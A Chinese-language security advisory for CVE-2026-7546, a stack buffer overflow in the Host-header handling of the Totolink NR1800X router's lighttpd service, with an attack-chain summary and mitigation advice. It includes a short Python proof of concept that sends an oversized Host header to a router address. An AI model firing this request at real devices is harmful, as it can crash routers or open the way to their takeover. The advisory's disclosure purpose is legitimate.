CVE-2026-7546 CVSS 9.8 严重

CVE-2026-7546 Totolink NR1800X栈溢出漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7546

漏洞类型

栈缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink NR1800X

漏洞概述

Totolink NR1800X路由器固件版本9.1.0u.6279_B20210910中存在高危安全漏洞。该漏洞位于lighttpd组件的`find_host_ip`函数中，由于对HTTP头部`Host`参数的处理缺乏长度校验，导致栈缓冲区溢出。攻击者无需用户交互及身份认证，即可通过网络远程发送特制恶意数据包触发该漏洞。成功利用此漏洞可能导致设备服务拒绝响应，或在受影响设备上执行任意代码，进而完全接管设备控制权。鉴于漏洞利用代码已公开，风险极高。

技术细节

该漏洞原理在于典型的C语言内存操作错误。在Totolink NR1800X使用的lighttpd服务程序中，`find_host_ip`函数负责处理传入HTTP请求的Host头部信息。当程序解析该字段时，直接将其内容拷贝至栈上的局部缓冲区，且未检查输入数据的长度是否超过缓冲区容量。攻击者可以构造一个超长的Host字符串（例如包含数千个字符的特定模式），通过发送HTTP请求提交给目标设备。这种超长输入会覆盖栈上的返回地址或其他关键寄存器状态，从而改变程序的执行流程。由于CVSS评分为9.8，攻击复杂度低且无需权限，攻击者可轻易实现远程代码执行（RCE），获取系统最高权限。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别暴露的Totolink NR1800X设备及其Web服务端口。

STEP 2

漏洞利用

攻击者向目标设备的Web服务端口发送特制的HTTP请求，其中包含超长的`Host`头部字段。

STEP 3

溢出触发

`find_host_ip`函数处理超长Host头时发生栈缓冲区溢出，覆盖返回地址。

STEP 4

代码执行

程序流程被劫持，攻击者注入的Shellcode被执行，从而获得设备的控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# Target configuration
target_ip = "192.168.1.1"
target_url = f"http://{target_ip}/"

# Generate payload to trigger stack overflow
# Adjust length based on specific buffer size (e.g., 1000 bytes)
payload = "A" * 1000

# Malicious header
headers = {
    "Host": payload,
    "User-Agent": "CVE-2026-7546-POC"
}

def exploit():
    try:
        print(f"[*] Sending payload to {target_url}...")
        response = requests.get(target_url, headers=headers, timeout=5)
        print(f"[!] Request sent. Status code: {response.status_code}")
        print("[*] Check if the device has crashed or if shell is accessible.")
    except requests.exceptions.Timeout:
        print("[!] Connection timed out. The device may have crashed due to buffer overflow.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Totolink NR1800X 9.1.0u.6279_B20210910

防御指南

临时缓解措施

建议立即检查设备固件版本并应用官方补丁。在无法立即升级的情况下，应通过访问控制列表（ACL）禁用互联网侧对路由器管理界面的访问，仅允许信任的内网IP进行管理，以降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7546
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7546
3 Details https://www.cvedetails.com/cve/CVE-2026-7546/
4 VulDB https://vuldb.com/cve/CVE-2026-7546
5 Link https://github.com/newym/cve/blob/main/totolinknr1800x.md
6 Link https://vuldb.com/submit/804404
7 Link https://vuldb.com/vuln/360357
8 Link https://vuldb.com/vuln/360357/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表